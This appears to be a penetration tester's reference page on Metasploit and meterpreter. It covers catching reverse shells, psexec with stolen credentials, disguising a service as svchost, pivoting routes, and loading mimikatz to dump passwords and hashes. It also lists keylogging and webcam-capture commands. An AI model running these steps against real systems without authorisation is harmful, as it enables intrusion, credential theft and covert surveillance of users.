Comment on page

Metasploit

Who cares if it's easy, that's the point right?

Common Uses

Using the exploit/multi/handler to catch reverse shells and manage several sessions. Make sure that you have the correct payload to catch.
Use the exploit/windows/smb/psexec module with known credentials to create easy meterpreter sessions to pivot and exploit further. Can set the SERVICE_FILENAME option to remove the random garbage used, because its suspicious (using something like svchost helps hide!).

Meterpreter

Payload with fancy shell, series of DLLs injected into a process memory and doesnt touch the disk, no separate process created. All comms over meterpreter are TLS encrypted unless specifically told not to.
# Below adds a port fwd, localhost:1234 -> meterpreter -> 10.0.0.1:22
meterpreter > portfwd add -l 1234 -p 22 -r 10.0.0.1
# Below adds a route to move all traffic for a subnet thru meterpreter session #1
msf > route add [subnet] [netmask] [session id]
msf > route add 10.0.1.0 255.255.255.0 1 # routes thru session 1 for 10.0.1.0/24
msf > route add 10.0.0.5 255.255.255.255 1 # routes thru session 1 for host 10.0.0.5

Managing Meterpreter Sessions

Sessions are managed with the sessions -l command. Channels inside of sessions are managed with channels -l command. Upgrade existing shells with the sessions -u 1 command.
CTRL-Z will background a channel or session
Load additional modules using use [module name]

Mimikatz in Meterpreter

We can load mimikatz directly into a running meterpreter session, giving us serious power. Need to be running as SYSTEM, and we need to make sure the process we're in is the same architecture as the host.
Check if we're in matching arch types with sysinfo. Check the Architecture and Meterpreter info to make sure they match. If we need to move, check which running processes have the correct arch and are running as SYSTEM also with ps -A x64 -s, then we can move with migrate [PID]. Validate the arch and meterpreter types match with sysinfo again.
Now we can import the mimikatz module with load kiwi. Running help will show our new mimikatz commands we can use. Using creds_all will dump all available hashes and plaintext passwords!

Meterpreter Commands

Command
Function
help
shows all available commands
sysinfo
Shows computer name, OS, and kernel information
shell
Launch a command shell on the host
getpid
show process ID of current meterpreter process
getuid
shows current user ID meterpereter is running under
ps
get list of processes
migrate
attempts to move to a different process ID
cd / lcd
change dir, local change dir
ls / lls
list contents, local list contents
download
download a file from the machine
upload
upload a file to the machine
edit
edit a file using vi or nano
ipconfig
show host networking information
route
displays, adds, or deletes host routing table
portfwd
forwards traffic to a different location as a TCP relay
creds_all
Mimikatz meterpreter module as kiwi
hashdump
gather hashes from host memory, requires SYSTEM privs
run hashdump
Pulls from the registry (SAM and Syskey)
run post/windows/gather/smart_hashdump
Gathers from the disk NTDS.dit and SAM
run post/windows/gather/hashdump
Pulls from registry (SAM and Syskey)
screenshot -p /tmp/screen.jpg
grabs a screenshot of the desktop
uictl
Turn user devices on or off
webcam_list
webcam_snap
Take control of a webcam available to the host
keyscan_start
keyscan_dump
keyscan_stop
Keystroke logger to gather information as its typed

Arsenal

Modular combination of scanners, exploits, payloads, and post modules.
User Interface
Purpose
msfconsole
Basic MSF prompt for exploitation
msfd
Daemon listening on TCP 55554 allowing msfconsole access to anyone that connects
msfrpcd
XMLRPC controlled MSF, default TCP 55553 using SSL
msfcli
MSF with all options specified in a single command, useful for scripting
msfvenom
Used to generate malicious payloads and binaries

Modules

Module Name
Purpose
auxiliary
Port scanners, DoS tools, login checks, etc
encoders
Convert exploits and payloads to attempt to bypass filters
exploits
Exploits used to attack a system
nops
Create NOP sleds
payloads
Huge list of payloads based on system and type
post
Post-exploitation modules to futher exploit a system

Troubleshooting

Having issues importing a module? make sure that you check the logs at ~/.msf4/logs/framework.log